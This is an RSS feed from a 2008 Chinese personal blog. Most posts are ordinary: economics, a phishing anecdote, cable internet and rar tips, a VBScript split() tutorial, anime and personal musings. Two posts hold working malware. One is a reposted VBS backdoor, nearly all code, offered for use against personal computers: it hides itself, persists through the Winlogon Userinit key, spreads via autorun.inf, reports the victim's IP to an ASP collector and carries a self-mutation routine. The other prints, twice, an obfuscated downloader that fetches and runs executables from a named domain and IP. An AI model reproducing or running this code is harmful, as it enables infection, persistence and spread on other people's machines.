<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title><![CDATA[小飞的blog]]></title> 
<link>http://www.boofee.net/bigfee/index.php</link> 
<description><![CDATA[小飞的blog]]></description> 
<language>zh-cn</language> 
<copyright><![CDATA[小飞的blog]]></copyright>
<item>
<link>http://www.boofee.net/bigfee/read.php?964</link>
<title><![CDATA[吴敬链、许小年、华生]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Tue, 02 Dec 2008 13:11:03 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?964</guid> 
<description>
<![CDATA[ 
	吴敬链、许小年、华生
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?962</link>
<title><![CDATA[[转]关于钓鱼式攻击]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[计算机文章]]></category>
<pubDate>Wed, 26 Nov 2008 02:03:31 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?962</guid> 
<description>
<![CDATA[ 
	作者：<a href="http://hi.baidu.com/monyer/blog/item/2b9e708bf94c9215c8fc7a97.html" target="_blank">monyer</a><br/>有个例子，我也不记得以前说过没有。<br/>钓鱼式攻击是什么东西呢？其实很简单：<br/>某人Email给你：给我500块，预知你的未来，可以提前通知你，明天国王跟火箭队的比赛，火箭队会赢！<br/>你当然不信啦，但是第二天的比赛，火箭队真的赢了，你说：巧合，巧合而已。<br/>过了几天，他又email给你：给我500快，预知你的未来，可以提前通知你，明天湖人跟火箭队的比赛，湖人赢了。<br/>你有点好奇，但你是绝对不会把钱给他的，但是第二天的比赛，湖人真赢了，你说：诶？难道是潜规则？<br/>又过了几天，他又email给你：给我500快，预知你的未来，可以提前通知你，明天湖人跟七六人队的比赛，湖人赢了。<br/>你开始猜，是不是真的啊？但第二天的比赛，湖人又赢了。<br/>......<br/>经过若干次循环后，你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时，你才知道上当了！<br/>因为事情是这样的：<br/>第一次发信8192封，一半说国王赢，一般说火箭赢；<br/>第二次只给说火箭赢的4096人发信，分为2048人为湖人赢，2048为火箭赢；<br/>第三次只给说湖人赢的2048人发信，分为1024人为湖人赢，1024为七六人赢；<br/>......<br/>很有可能他最终欺骗到的人只有10，但是这已经足够！<br/>所以你可以说钓鱼式攻击一点技术含量都没有，不过可能你仍会因此被骗。<br/>另外钓鱼者超多，请小心诱饵！<br/><br/><br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E9%2592%2593%25E9%25B1%25BC%25E6%2594%25BB%25E5%2587%25BB" rel="tag">钓鱼攻击</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?961</link>
<title><![CDATA[有线通上网显示受限制或无连接,但另一个电脑可以上]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[计算机文章]]></category>
<pubDate>Sun, 23 Nov 2008 15:33:00 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?961</guid> 
<description>
<![CDATA[ 
	同学给我打电话,说他家的电脑出问题了.<br/>状况如下:<br/>他用的是有线通网络,他自己的笔记本可以正常上网,但把网线拔掉,换到另一台笔记本时,新接入的笔记本却无法上网,ip配置都是正确的,使用的是自动获取,但不知道为什么就是上不了.<br/>听完他的叙述,我想了想,可能是有线通的计费系统把他的ip和mac地址绑定的缘故.所以我提出两个解决方法:<br/>方法一、断掉有线通猫的电源，关闭电脑，过半小时以后再上。这样有可能解决<br/>方法二、在能上网的电脑，打开运行——输入cmd，回车——在命令行提示中输入ipconfig /release ，释放ip。然后断掉电脑。把网线插入原先不能上的电脑的网卡上，同样打开运行——输入cmd，回车——在命令行提示中输入ipconfig /renew<br/>根据我的推测，使用以上两个办法，因该是可以解决有线通上网显示受限制或无连接,但另一个电脑可以上的问题。<br/>如果有朋友是有线通，正好碰到上面这个问题时帮我测试下，如果不行请留言告诉我，呵呵~<br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E6%259C%2589%25E7%25BA%25BF%25E9%2580%259A" rel="tag">有线通</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E4%25B8%258A%25E7%25BD%2591" rel="tag">上网</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E9%2599%2590%25E5%2588%25B6" rel="tag">限制</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?959</link>
<title><![CDATA[海贼王的评论]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Mon, 17 Nov 2008 13:12:07 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?959</guid> 
<description>
<![CDATA[ 
	路飞妈妈是海军大将,爷爷是海军中将,奶奶是海军本部参谋.路飞爸爸是革命家,姐姐是四皇中的蓝眼,哥哥是白胡子海贼三头目火拳艾斯.师傅是弗多达里克[狐之男人],大舅海贼王罗杰,王下七武海是罗杰的手下,二舅黑胡子帝奇.好朋友香克斯.史上最强家族..我开始还以为他是平民英雄,搞到最后是贵族中的贵族子弟.有谁敢动他?将被海军,革命军,七武海,四皇,联合追杀...倒..倒..倒.....................路飞拥有着显赫的背景,凭着强力外援,他不做海贼王,谁做?<br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E6%25B5%25B7%25E8%25B4%25BC%25E7%258E%258B" rel="tag">海贼王</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?957</link>
<title><![CDATA[转经典论坛（通过实例来实现split的理解）]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Mon, 10 Nov 2008 08:53:40 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?957</guid> 
<description>
<![CDATA[ 
	最近研究代码变形,其中用到一个split函数,碰巧网上看到篇文章,不错,讲的很详细,所以转过来,希望用到的朋友可以看下<br/><br/><div class="quote"><div class="quote-title">引用</div><div class="quote-content">作者：帅青蛙<br/>最初发表于：经典论坛（通过实例来实现split的理解）<br/>版权帅青蛙所有，如有引用，请注明相关信息。<br/><br/>大家有没有碰到过要想取一字符串里的某些值而无从下手？有没有觉得看书或教材对split的写法糊里糊涂……如果有此疑问的话，请看下面我对例子的解释，相信您会对这个有一定的了解。<br/><br/>例如我想取得一个ftp里的用户名及密码（服务器等）值（用IE当FTP时或从表中取出FTP的值）。<br/>下面是我的解决思路：<br/>设url为收到的URL值，这里指：url=ftp://username:password@server，请注意这句话的规律<br/>我想大家都看清楚这个URL里的规律了吧，就是各个部分都被":"给区分成三个部分，即：ftp、//username、password@server<br/>首先将这个URL的各个部分区分开来，用split(url, ":")<br/>以下是具体的代码：<br/><br/><div class="code">parts = split(url, &quot;:&quot;) &#039;此时parts就有三部分，parts(0)=ftp，parts(1)=//username，parts(2)=password@server&#039;接下来剔除没有用到的信息&#039;由于只取username，所以其中parts(0)跟parts(2)是无用的，直接不引用！newname=replace(parts(1), &quot;//&quot;, &quot;&quot;) &#039;去除//符号，因为这不是username里的内容&#039;此时的newname既为用户名。 </div><br/><br/><br/>以上是只取用户名的代码，如果你要再取密码的话，可以参考下面。<br/><br/><div class="code">&#039;由于用户名是属于parts(2)里的，而且包含服务器的信息，如果不取服务器，则：newpass = left(parts(2), instr(parts(2),&quot;@&quot;)-1) &#039;取值到@之前的位数。此时的newpass取为密码 </div><br/><br/><br/>以上代码为不取服务器地址的代码，如果有取服务器的话，其实也是很简单的<br/><br/><div class="code">newparts=split(parts(2),&quot;@&quot;) &#039;此时newparts分成两部分：newparts(0)为密码，即password；newparts(1)则为服务器地址，即server&#039;如果要输出密码的的话，直接response.write newparts(0)就可以了，服务器就newparts(1) </div><br/>后话，对于要取一字符串中的某些字符或部分，只要抓住规律，再加上用split就可以很好做成各种效果。写此文，希望对大家的学习有所帮助，同时也希望大家能够指点一二！ <br/>责任编辑：H.R.M</div></div><br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=vbs" rel="tag">vbs</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E4%25BB%25A3%25E7%25A0%2581%25E5%258F%2598%25E5%25BD%25A2" rel="tag">代码变形</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=split" rel="tag">split</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?956</link>
<title><![CDATA[师德？]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Sun, 09 Nov 2008 06:35:43 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?956</guid> 
<description>
<![CDATA[ 
	跟同事聊天,谈到小孩子读书的事情.同事说现在小孩子别说读小学中学了,就是读幼儿园,都要送钱.然后举了个例子说他儿子读的幼儿园,儿子的班级有两个班主任,每个班主任都送了500块钱,正的班主任客气了下收下了,副班主任客气都没可以直接就收下了.我问他,不送不行吗?同事说:"大家都送,我不送老师对孩子不好怎么办?"说完同事感叹下世风日下....<br/><br/><br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E5%25B8%2588%25E5%25BE%25B7" rel="tag">师德</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?955</link>
<title><![CDATA[太累了，放开了，失去了，矛盾了]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Sat, 08 Nov 2008 12:28:03 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?955</guid> 
<description>
<![CDATA[ 
	最近思想很矛盾，受到的压力也蛮大的，索性让工作填满我的生活<br/>我只是想说，不想让任何人受到伤害<br/>我只是想说，我做的事情并不是我想做的<br/>我只是想说，世事难料<br/>我只是想说，太累了，放开了，失去了，矛盾了……<br/>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?954</link>
<title><![CDATA[cmd命令行下制作rar压缩包]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[计算机文章]]></category>
<pubDate>Sat, 08 Nov 2008 12:10:51 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?954</guid> 
<description>
<![CDATA[ 
	rar.exe a -k -s -m1 c:&#92;windows&#92;test.rar "C:&#92;program files"<br/>第一个c:&#92;windows&#92;test.rar是作为压缩以后生成的文件<br/>后一个双引号里的意思是打包c盘下program files里面所有的文件<br/>注意:program files后面没有"&#92;"<br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=cmd" rel="tag">cmd</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=rar" rel="tag">rar</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E5%258E%258B%25E7%25BC%25A9%25E5%258C%2585" rel="tag">压缩包</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?952</link>
<title><![CDATA[转：vbs脚本后门一个]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Tue, 04 Nov 2008 08:50:32 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?952</guid> 
<description>
<![CDATA[ 
	vbs脚本后门一个<br/>本文在华夏黑客联盟首发，应版主要求加上首发链接：<a href="http://www.hxhack.com/bbs/read.php?tid-173436.html" target="_blank">http://www.hxhack.com/bbs/...</a><br/>非常批处理第二发布，转载请声明。<br/><br/>自己写的脚本后门，可以用来对付个人电脑，在xp下测试通过<br/><br/>如果把首行注释掉，运行时会提示“没有权限” ，这是由于后门运行时试图覆盖自身文件（系统属性）造成的，不影响运行。<br/><br/><br/>On Error Resume Next'调试时注释掉本行<br/>'--------------------------<br/>'打开所在分区，避免分区打不开引起怀疑<br/>Dim fso,wshshell,name_vbs,path_vbs,path_root<br/>Set fso = Wscript.CreateObject ( "Scrip" & "ting.Fi" & "leSys" & "temObject" )<br/>Set wshshell = WScript.CreateObject ( "WScript.Shell" )<br/>path_vbs = WScript.ScriptFullName<br/>name_vbs = fso.GetFileName ( path_vbs )<br/>path_root = fso.GetDriveName ( path_vbs )<br/>IF path_vbs = path_root & "&#92;" & name_vbs Then<br/>WshShell.SendKeys "%&#123;F4&#125;"<br/>wshshell.Run path_root<br/>End If<br/>'--------------------------<br/>'避免同时运行多个脚本<br/>Dim tempfoldr,tempfile,tempfiles,ext,tempname<br/>If (fso.FolderExists("c:&#92;windows&#92;temp&#92;qq&#92;")) Then<br/>wscript.sleep 100<br/>Else<br/>fso.CreateFolder("c:&#92;windows&#92;temp&#92;qq&#92;")<br/>End if<br/>Set tempfoldr = fso.getfolder( "c:&#92;windows&#92;temp&#92;qq&#92;" )<br/>set tempfiles = tempfoldr.files<br/>For Each tempfile in tempfiles<br/>If tempfile = "" Then<br/>wscript.sleep 100<br/>Else<br/>ext = fso.GetExtensionName ( tempfile )<br/>ext = CLng(ext)<br/>tempname = fso.GetBaseName ( tempfile )<br/>If timer - ext < 20 and tempname = Date Then<br/>Wscript.Quit<br/>End If<br/>End If<br/>Next<br/>'--------------------------<br/>'初始化变量，准备循环<br/>Dim dev , devr , num , regpath , windowname , bag , pipe , attrib , name_window , xPost , url , name , pwd , request , ip , httppost<br/>name_window = Array ( name_vbs , "autorun.inf" )<br/>Set dev = fso.Drives<br/>Set bag = GetObject ( "winmgmts:&#92;&#92;.&#92;root&#92;cimv2" )<br/>attrib = "attrib +s +h "<br/>regpath1 = "HKCU&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Explorer&#92;Advanced&#92;"<br/>regpath2 = "HKLM&#92;SOFTWARE&#92;Microsoft&#92;Windows NT&#92;CurrentVersion&#92;Winlogon"<br/>fso.CopyFile path_vbs , "c:&#92;windows&#92;" , True<br/>wshshell.Run attrib & "c:&#92;windows&#92;" & name_vbs , 0<br/>ip = GetIP<br/>url = "http://localhost/qq.asp"<br/>Set xPost = CreateObject("Microsoft.XMLHTTP")<br/>httppost = true<br/>num = 1<br/>Do<br/>'--------------------------<br/>'隐藏自身，修改注册表<br/>If num Mod 5 = 1 Then<br/>wshshell.Run attrib&path_vbs , 0<br/>WshShell.RegWrite regpath1 & "ShowSuperHidden" , "0", "REG_DWORD"<br/>WshShell.RegWrite regpath1 & "Hidden" , "2" , "REG_DWORD"<br/>WshShell.RegWrite regpath2 & "&#92;Userinit" , "C:&#92;windows&#92;system32&#92;userinit.exe,C:&#92;windows&#92;" & name_vbs & "," , "REG_SZ"<br/>End If<br/>'--------------------------<br/>'遍历所有分区，并隐藏<br/>If num Mod 20 = 1 Then<br/>For Each devr In dev<br/>If devr.DriveType = 3 or devr.DriveType = 2 or devr.DriveType = 1 Then<br/>If devr <> "A:" Then<br/>fso.CopyFile name_vbs , devr & "&#92;" , True<br/>CreateAutoFile name_vbs , devr<br/>wshshell.run attrib & devr & "&#92;" & name_vbs , 0<br/>wshshell.Run attrib & devr & "&#92;" & "autorun.inf" , 0<br/>End If<br/>End If<br/>Next<br/>End If<br/>'--------------------------<br/>'关闭标题含name_window的窗口，可考虑加一些其它的，再加上进程监视<br/>For Each windowname In name_window<br/>If WshShell.AppActivate ( windowname ) = True Then<br/>WshShell.SendKeys "%&#123;F4&#125;"<br/>End if<br/>Next<br/>Set pipe = bag.Execquery ( "select * from win32_process where name = 'ujurd.exe' or name = 'qdtyd.exe'")<br/>For Each process In pipe<br/>process.terminate()<br/>Next<br/>'--------------------------<br/>'asp 发信<br/>If httppost = true Then<br/>xPost.Open "Post",url,false<br/>xPost.setrequestheader "Content-Type","application/x-www-form-urlencoded"<br/>xPost.send "ip=" & ip<br/>If xPost.responsetext = "OK" Then<br/>httppost = false<br/>End If<br/>End If<br/>'--------------------------<br/>'这里可以添加你自己的代码<br/>'比如下载木马运行等<br/>'--------------------------<br/>'更新运行标志<br/>If num Mod 7 = 1 Then<br/>fso.DeleteFile "c:&#92;windows&#92;temp&#92;qq&#92;*"<br/>fso.CreateTextFile ( "c:&#92;windows&#92;temp&#92;qq&#92;" & Date & "." &CLng ( timer ) )<br/>End If<br/>'--------------------------<br/>'睡一会儿，并把计数器加一<br/>wscript.sleep 1000<br/>num = num + 1<br/>Loop<br/>'--------------------------<br/>'创建autorun.inf<br/>Function CreateAutoFile ( name_vbs , path )<br/>On Error Resume Next<br/>Set fso = Wscript.CreateObject ( "Scrip" & "ting.Fi" & "leSys" & "temObject" )<br/>Dim autotext,auto_file<br/>autotext = "[AutoRun]" & vbCrLf & "open=" & vbCrLf & "shell&#92;open=打开(&O)" & vbCrLf & "shell&#92;open&#92;Command=Wscript.exe " & name_vbs & vbCrLf & "shell&#92;open&#92;Default=1" & vbCrLf & "shell&#92;explore=资源管理器(&X)" & vbCrLf & "shell&#92;explore&#92;Command=Wscript.exe " & name_vbs<br/>Set auto_file = fso.OpenTextFile ( path & "&#92;autorun.inf" , 2 , true )<br/>auto_file.Write ( autotext )<br/>auto_file.Close<br/>End Function<br/>'---------------------------<br/>'自变形引擎[运行出错……晕……请自己改吧]<br/>Function AutoDeformation ( )<br/>Set fso = CreateObject( "Scrip" & "ting.Fi" & "leSys" & "temObject" )<br/>vCll = fso.OpenTextFile(WScript.ScriptFullName,1).Readall<br/>fSds=Array("AutoDeformation","fso","fSds","tttt","vCll","auto_file","pipe","wshshell","name_vbs","path_vbs","path_root","tempfoldr","tempfile","tempfiles","ext","tempname","dev","num","regpath","windowname","bag","attrib","name_window")<br/>For Each tttt In fSds<br/>vCll = Replace(vCll,tttt, Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))<br/>Next<br/>fso.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vCll<br/>End Function<br/>'---------------------------<br/>'获取本机IP<br/>'return 本机的IP地址<br/>Function GetIP<br/>Dim objWMIService,colItems,objItem,objAddress<br/>Set objWMIService = GetObject("winmgmts:&#92;&#92;.&#92;root&#92;cimv2")<br/>Set colItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True")<br/>For Each objItem in colItems<br/>For Each objAddress in objItem.IPAddress<br/>If objAddress <> "" then<br/>GetIP = objAddress<br/>Exit Function<br/>End If<br/>Next<br/>Next<br/>End Function<br/>'----------------------------<br/><br/>下面是asp收信文件<br/><br/><%<br/>strLogFile="qq2008jh.txt"<br/><br/>ip = request("ip")<br/><br/>if ip ="" then<br/>response.write "Sorry! 您没有权限查看该页！"<br/>response.end<br/>End If<br/>StrLogText=StrLogText &amp; "IP: " &amp; ip &amp; " (" &amp; request.servervariables("REMOTE_HOST") &amp; ") -- " &amp; date &amp; " " &amp; time<br/><br/>set f=Server.CreateObject("scripting.filesystemobject")<br/>set ff=f.opentextfile(server.mappath(".")&amp;"&#92;"&amp;strLogFile,8,true,0)<br/>ff.writeline(chr(13)+chr(10)&amp;StrLogText)<br/>ff.close<br/>set ff=nothing<br/>set f=nothing<br/><br/>response.write "OK"<br/>%><br/><br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=vbs" rel="tag">vbs</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E8%2584%259A%25E6%259C%25AC" rel="tag">脚本</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=vbs%25E8%2584%259A%25E6%259C%25AC%25E5%258F%2598%25E5%25BD%25A2" rel="tag">vbs脚本变形</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a>
]]>
</description>
</item><item>
<link>http://www.boofee.net/bigfee/read.php?951</link>
<title><![CDATA[病毒实例]]></title> 
<author>bigfee &lt;bigfee@163.com&gt;</author>
<category><![CDATA[我的日志]]></category>
<pubDate>Tue, 04 Nov 2008 07:44:03 +0000</pubDate> 
<guid>http://www.boofee.net/bigfee/read.php?951</guid> 
<description>
<![CDATA[ 
	网上发现一个朋友中的病毒，看了下，这个病毒里有很多值得学习的地方，呵呵~<br/>360总是查出有木马系统时间经常就变成2001年7月份了,c:&#92;windows&#92;helps&#92;目录下还有bai.bat，help.dll，bai.vbs病毒文件，始终无法删除，会再生。<br/><br/>bai.bat文件内容如下：<br/><br/>del sss0.exe<br/><br/>ftp.exe -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>if not exist sss0.exe sfd -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>if not exist sss0.exe sft -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>sss0.exe<br/><br/>sss0.exe<br/><br/>sss01.exe<br/><br/>sss01.exe<br/><br/>if not exist sss0.exe C:&#92;WINDOWS&#92;help&#92;bai.VBS<br/><br/>:end<br/><br/>del C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>del C:&#92;WINDOWS&#92;help&#92;bai.BAT<br/><br/>exit<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>bai.vbs文件内容如下：<br/><br/>on error resume next<br/><br/>set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))<br/><br/>Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))<br/><br/>xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)<br/><br/>xPost.Send()<br/><br/>Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))<br/><br/>sGet.Mode = Chr(51)<br/><br/>sGet.Type = Chr(49)<br/><br/>sGet.Open()<br/><br/>sGet.Write(xPost.responseBody)<br/><br/>sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)<br/><br/>oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide<br/><br/>oshell.RUN "cmd.exe /c del C:&#92;WINDOWS&#92;help&#92;bai.VBS",vbhide<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>help.dll内容如下：<br/><br/>OPEN 59.34.197.188<br/><br/>and3<br/><br/>get crr.ini sss0.exe<br/><br/>get crt.ini sss01.exe<br/><br/>bye<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>好像是自动在59.34.197.188下载木马病毒，不知道怎么删除！目前最新的360均无法清楚，病毒会不定期再生!<br/><br/>我也是这样的情况<br/><br/>而且，系统时间经常就变成2001年7月份了,c:&#92;windows&#92;helps&#92;目录下还有bai.bat，help.dll，bai.vbs病毒文件，始终无法删除，会再生。<br/><br/>bai.bat文件内容如下：<br/><br/>del sss0.exe<br/><br/>ftp.exe -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>if not exist sss0.exe sfd -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>if not exist sss0.exe sft -s:C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>sss0.exe<br/><br/>sss0.exe<br/><br/>sss01.exe<br/><br/>sss01.exe<br/><br/>if not exist sss0.exe C:&#92;WINDOWS&#92;help&#92;bai.VBS<br/><br/>:end<br/><br/>del C:&#92;WINDOWS&#92;help&#92;help.dll<br/><br/>del C:&#92;WINDOWS&#92;help&#92;bai.BAT<br/><br/>exit<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>bai.vbs文件内容如下：<br/><br/>on error resume next<br/><br/>set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))<br/><br/>Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))<br/><br/>xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"ps.gogo52o.com/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)<br/><br/>xPost.Send()<br/><br/>Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))<br/><br/>sGet.Mode = Chr(51)<br/><br/>sGet.Type = Chr(49)<br/><br/>sGet.Open()<br/><br/>sGet.Write(xPost.responseBody)<br/><br/>sGet.SaveToFile "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)<br/><br/>oshell.RUN "sss0"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide<br/><br/>oshell.RUN "cmd.exe /c del C:&#92;WINDOWS&#92;help&#92;bai.VBS",vbhide<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>help.dll内容如下：<br/><br/>OPEN 59.34.197.188<br/><br/>and3<br/><br/>get crr.ini sss0.exe<br/><br/>get crt.ini sss01.exe<br/><br/>bye<br/><br/>＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝<br/><br/>好像是自动在59.34.197.188下载木马病毒，不知道怎么删除！目前最新的360均无法清楚，病毒会不定期再生!<br/><br/>Tags - <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E8%2584%259A%25E6%259C%25AC" rel="tag">脚本</a> , <a href="http://www.boofee.net/bigfee/tag.php?tag=%25E7%2597%2585%25E6%25AF%2592" rel="tag">病毒</a>
]]>
</description>
</item>
</channel>
</rss>